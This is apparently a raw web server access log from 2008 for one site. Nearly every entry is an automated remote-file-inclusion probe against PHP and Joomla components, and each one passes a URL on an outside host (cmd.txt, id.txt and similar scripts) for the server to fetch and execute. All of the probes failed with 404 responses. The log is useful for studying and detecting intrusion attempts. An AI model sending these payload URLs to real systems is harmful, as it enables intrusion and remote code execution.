67.19.22.123 - - [26/Jan/2008:04:00:01 -0800] "GET /logs/access_071222.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.22.123 - - [26/Jan/2008:04:00:02 -0800] "GET /logs/access_071222.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://nocsom.org/images/IDsafeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.186.169.183 - - [26/Jan/2008:04:00:26 -0800] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [26/Jan/2008:04:00:26 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [26/Jan/2008:04:00:26 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.239.16.35 - - [26/Jan/2008:04:00:31 -0800] "GET /logs/access_071230.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.sumutprov.go.id/modules/poll/.../safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.186.169.183 - - [26/Jan/2008:04:00:48 -0800] "GET /logs/access_071222.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.26.219.82 - - [26/Jan/2008:04:00:55 -0800] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.26.219.82 - - [26/Jan/2008:04:00:56 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.26.219.82 - - [26/Jan/2008:04:00:56 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.26.219.82 - - [26/Jan/2008:04:01:04 -0800] "GET /logs/access_071220.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.22.123 - - [26/Jan/2008:04:01:14 -0800] "GET /logs/access_071221.log/convert/mvcw.php?vwar_root=http://nocsom.org/images/IDsafeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.22.123 - - [26/Jan/2008:04:01:14 -0800] "GET /convert/mvcw.php?vwar_root=http://nocsom.org/images/IDsafeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.22.123 - - [26/Jan/2008:04:01:14 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://nocsom.org/images/IDsafeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.22.123 - - [26/Jan/2008:04:01:14 -0800] "GET /logs/access_071221.log/convert/mvcw.php?vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.22.123 - - [26/Jan/2008:04:01:14 -0800] "GET /convert/mvcw.php?vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.22.123 - - [26/Jan/2008:04:01:14 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.186.169.183 - - [26/Jan/2008:04:02:23 -0800] "GET /logs/access_071221.log/convert/mvcw.php?vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [26/Jan/2008:04:02:23 -0800] "GET /convert/mvcw.php?vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.22.123 - - [26/Jan/2008:04:02:24 -0800] "GET /logs/access_071224.log/convert/mvcw.php?vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.186.169.183 - - [26/Jan/2008:04:02:24 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.22.123 - - [26/Jan/2008:04:02:29 -0800] "GET /logs/access_071224.log/convert/mvcw.php?vwar_root=http://nocsom.org/images/IDsafeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.186.169.183 - - [26/Jan/2008:04:03:26 -0800] "GET /logs/access_071225.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [26/Jan/2008:04:03:26 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [26/Jan/2008:04:03:26 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.25.151.161 - - [26/Jan/2008:04:03:33 -0800] "GET /logs/access_080106.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://test.drugfreedetroit.com/components/com_magazine/layouts/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.151.161 - - [26/Jan/2008:04:03:39 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://test.drugfreedetroit.com/components/com_magazine/layouts/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.186.169.183 - - [26/Jan/2008:04:03:40 -0800] "GET /logs/access_071224.log/convert/mvcw.php?vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.25.151.161 - - [26/Jan/2008:04:03:46 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://test.drugfreedetroit.com/components/com_magazine/layouts/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.105.35.14 - - [26/Jan/2008:04:04:28 -0800] "GET /logs/access_071230.log/index1.php?menu=http://www.contactoefectivo.com/administrator/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.105.35.14 - - [26/Jan/2008:04:04:29 -0800] "GET /index1.php?menu=http://www.contactoefectivo.com/administrator/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.105.35.14 - - [26/Jan/2008:04:04:32 -0800] "GET /logs/index1.php?menu=http://www.contactoefectivo.com/administrator/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.28.173 - - [26/Jan/2008:04:07:14 -0800] "GET /tmp/sess_8658d6a0cfaeacef7a9f60fb73d4c1e2 HTTP/1.0" 403 163 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.25.156 - - [26/Jan/2008:04:07:18 -0800] "GET /presto/?N=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
70.85.142.250 - - [26/Jan/2008:04:07:58 -0800] "GET /logs/access_071224.log/modules/Neos_Chronos/header.php?base_folder=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.142.250 - - [26/Jan/2008:04:07:58 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.142.250 - - [26/Jan/2008:04:07:58 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.18.96.42 - - [26/Jan/2008:04:09:45 -0800] "GET /logs/access_071230.log//modules/TotalCalendar/about.php?inc_dir=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.18.96.42 - - [26/Jan/2008:04:09:45 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.18.96.42 - - [26/Jan/2008:04:09:52 -0800] "GET /logs/access_080106.log//modules/TotalCalendar/about.php?inc_dir=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.164.122 - - [26/Jan/2008:04:10:22 -0800] "GET //components/com_extcalendar/admin_events.php?cmd=http://speedup.altervista.org/index_file/indexfile.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.178.176.36 - - [26/Jan/2008:04:10:25 -0800] "GET /logs//administrator/components/com_slideshow1/admin.slideshow1.php?mosConfig_live_site=http://www.connclan.net/albums/cmd.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.178.176.36 - - [26/Jan/2008:04:10:26 -0800] "GET //administrator/components/com_slideshow1/admin.slideshow1.php?mosConfig_live_site=http://www.connclan.net/albums/cmd.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.164.122 - - [26/Jan/2008:04:10:26 -0800] "GET /logs//components/com_extcalendar/admin_events.php?cmd=http://speedup.altervista.org/index_file/indexfile.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.164.122 - - [26/Jan/2008:04:10:32 -0800] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?cmd=http://speedup.altervista.org/index_file/indexfile.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.80.123.56 - - [26/Jan/2008:04:11:22 -0800] "GET /logs/access_071216.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://astroindo.org/box/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.80.123.56 - - [26/Jan/2008:04:11:22 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://astroindo.org/box/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.160.72.103 - - [26/Jan/2008:04:12:41 -0800] "GET /logs/access_071225.log///admin/index.php?loadadminpage=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.160.72.103 - - [26/Jan/2008:04:12:41 -0800] "GET ///admin/index.php?loadadminpage=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.160.72.103 - - [26/Jan/2008:04:12:41 -0800] "GET /logs///admin/index.php?loadadminpage=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.22.123 - - [26/Jan/2008:04:14:01 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.186.169.183 - - [26/Jan/2008:04:15:02 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.30.216.107 - - [26/Jan/2008:04:15:37 -0800] "GET /logs/access.log HTTP/1.0" 200 11212 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.106.163.232 - - [26/Jan/2008:04:16:39 -0800] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [26/Jan/2008:04:16:39 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [26/Jan/2008:04:16:40 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.186.169.183 - - [26/Jan/2008:04:16:43 -0800] "GET /convert/mvcw.php?vwar_root=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.106.163.232 - - [26/Jan/2008:04:17:14 -0800] "GET /logs/access_071222.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.19.225.162 - - [26/Jan/2008:04:18:11 -0800] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://theowns-host.we.bs/files/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.163.232 - - [26/Jan/2008:04:18:34 -0800] "GET /logs/access_071221.log/convert/mvcw.php?vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [26/Jan/2008:04:18:34 -0800] "GET /convert/mvcw.php?vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [26/Jan/2008:04:18:34 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
58.26.137.64 - - [26/Jan/2008:04:18:40 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.ispa-pecs-gis.hu/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
72.232.162.234 - - [26/Jan/2008:04:20:10 -0800] "GET /logs/access_071230.log//modules/TotalCalendar/about.php?inc_dir=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.162.234 - - [26/Jan/2008:04:20:10 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.75.193.55 - - [26/Jan/2008:04:20:20 -0800] "GET //components/com_smf/smf.php?mosConfig_absolute_path=http://www.surginet.info//modules/tinycontent/admin/spaw/.debug/id1.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
62.75.193.55 - - [26/Jan/2008:04:20:20 -0800] "GET /logs//components/com_smf/smf.php?mosConfig_absolute_path=http://www.surginet.info//modules/tinycontent/admin/spaw/.debug/id1.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
72.232.162.234 - - [26/Jan/2008:04:20:22 -0800] "GET /logs/access_080106.log//modules/TotalCalendar/about.php?inc_dir=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.19.225.162 - - [26/Jan/2008:04:20:29 -0800] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://theowns-host.we.bs/files/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.186.169.183 - - [26/Jan/2008:04:20:37 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.58.141.110 - - [26/Jan/2008:04:20:53 -0800] "GET /logs/access_080106.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.141.110 - - [26/Jan/2008:04:20:54 -0800] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.141.110 - - [26/Jan/2008:04:20:54 -0800] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.26.160 - - [26/Jan/2008:04:21:05 -0800] "GET /mobileoffice/ HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.106.163.232 - - [26/Jan/2008:04:23:57 -0800] "GET /logs/access_071224.log/convert/mvcw.php?vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.199.102.117 - - [26/Jan/2008:04:24:11 -0800] "GET /logs/access_071225.log//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.laila.jp/item_pics/cmd/cmd.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [26/Jan/2008:04:24:11 -0800] "GET //administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.laila.jp/item_pics/cmd/cmd.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [26/Jan/2008:04:24:12 -0800] "GET /logs//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.laila.jp/item_pics/cmd/cmd.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.193.236.107 - - [26/Jan/2008:04:24:16 -0800] "GET /logs/access_071225.log//skin/zero_vote/error.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.18.66 - - [26/Jan/2008:04:24:24 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.jwayauctions.com//logo/on.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.75.193.55 - - [26/Jan/2008:04:24:25 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.surginet.info//modules/tinycontent/admin/spaw/.debug/id1.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
62.75.193.55 - - [26/Jan/2008:04:24:25 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.surginet.info//modules/tinycontent/admin/spaw/.debug/id1.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
62.193.236.107 - - [26/Jan/2008:04:24:45 -0800] "GET /logs/access_071229.log//skin/zero_vote/error.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.151.161 - - [26/Jan/2008:04:25:04 -0800] "GET /logs/access_071230.log//modules/TotalCalendar/about.php?inc_dir=http://test.drugfreedetroit.com/components/com_magazine/layouts/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.151.161 - - [26/Jan/2008:04:25:10 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://test.drugfreedetroit.com/components/com_magazine/layouts/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.151.161 - - [26/Jan/2008:04:26:05 -0800] "GET /logs/access_080106.log//modules/TotalCalendar/about.php?inc_dir=http://test.drugfreedetroit.com/components/com_magazine/layouts/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [26/Jan/2008:04:26:20 -0800] "GET /logs/access_071224.log/modules/Neos_Chronos/header.php?base_folder=http://www.laila.jp/item_pics/cmd/cmd.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [26/Jan/2008:04:26:21 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.laila.jp/item_pics/cmd/cmd.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [26/Jan/2008:04:26:22 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.laila.jp/item_pics/cmd/cmd.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.132.12 - - [26/Jan/2008:04:26:30 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.kaozzoak.dk/images/on.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.21.152.2 - - [26/Jan/2008:04:26:34 -0800] "GET /logs/access_071224.log/modules/Neos_Chronos/header.php?base_folder=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.21.152.2 - - [26/Jan/2008:04:26:34 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.21.152.2 - - [26/Jan/2008:04:26:35 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.25.23 - - [26/Jan/2008:04:27:06 -0800] "GET /mobileoffice/?M=A HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.29.90.211 - - [26/Jan/2008:04:28:03 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.90.211 - - [26/Jan/2008:04:28:03 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.90.211 - - [26/Jan/2008:04:28:03 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.26.137.64 - - [26/Jan/2008:04:28:53 -0800] "GET /logs/access_071225.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.ispa-pecs-gis.hu/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [26/Jan/2008:04:28:57 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.ispa-pecs-gis.hu/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [26/Jan/2008:04:28:58 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.ispa-pecs-gis.hu/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
209.216.249.194 - - [26/Jan/2008:04:29:37 -0800] "GET /logs/access_071212.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.google-earth-3d.de//includes/.debug/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.216.249.194 - - [26/Jan/2008:04:29:38 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.google-earth-3d.de//includes/.debug/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.216.249.194 - - [26/Jan/2008:04:29:38 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.google-earth-3d.de//includes/.debug/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.25.151.161 - - [26/Jan/2008:04:30:47 -0800] "GET /logs/access_071230.log//modules/TotalCalendar/about.php?inc_dir=http://test.drugfreedetroit.com/components/com_magazine/layouts/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.151.161 - - [26/Jan/2008:04:30:52 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://test.drugfreedetroit.com/components/com_magazine/layouts/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.123.56 - - [26/Jan/2008:04:30:52 -0800] "GET /logs/access_080101.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://astroindo.org/box/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.151.161 - - [26/Jan/2008:04:31:01 -0800] "GET /logs/access_071230.log//modules/TotalCalendar/about.php?inc_dir=http://test.drugfreedetroit.com/components/com_magazine/layouts/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.18.66 - - [26/Jan/2008:04:31:05 -0800] "GET /logs/access_071230.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.jwayauctions.com//logo/on.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [26/Jan/2008:04:31:06 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.jwayauctions.com//logo/on.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [26/Jan/2008:04:31:06 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.jwayauctions.com//logo/on.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.25.151.161 - - [26/Jan/2008:04:31:06 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://test.drugfreedetroit.com/components/com_magazine/layouts/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.151.161 - - [26/Jan/2008:04:31:57 -0800] "GET /logs/access_080106.log//modules/TotalCalendar/about.php?inc_dir=http://test.drugfreedetroit.com/components/com_magazine/layouts/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.151.161 - - [26/Jan/2008:04:31:57 -0800] "GET /logs/access_080106.log//modules/TotalCalendar/about.php?inc_dir=http://test.drugfreedetroit.com/components/com_magazine/layouts/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.194.149.12 - - [26/Jan/2008:04:33:17 -0800] "GET /logs/access_071224.log/language/lang_german/lang_main_album.php?phpbb_root_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.12 - - [26/Jan/2008:04:33:17 -0800] "GET /language/lang_german/lang_main_album.php?phpbb_root_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.12 - - [26/Jan/2008:04:33:18 -0800] "GET /logs/language/lang_german/lang_main_album.php?phpbb_root_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
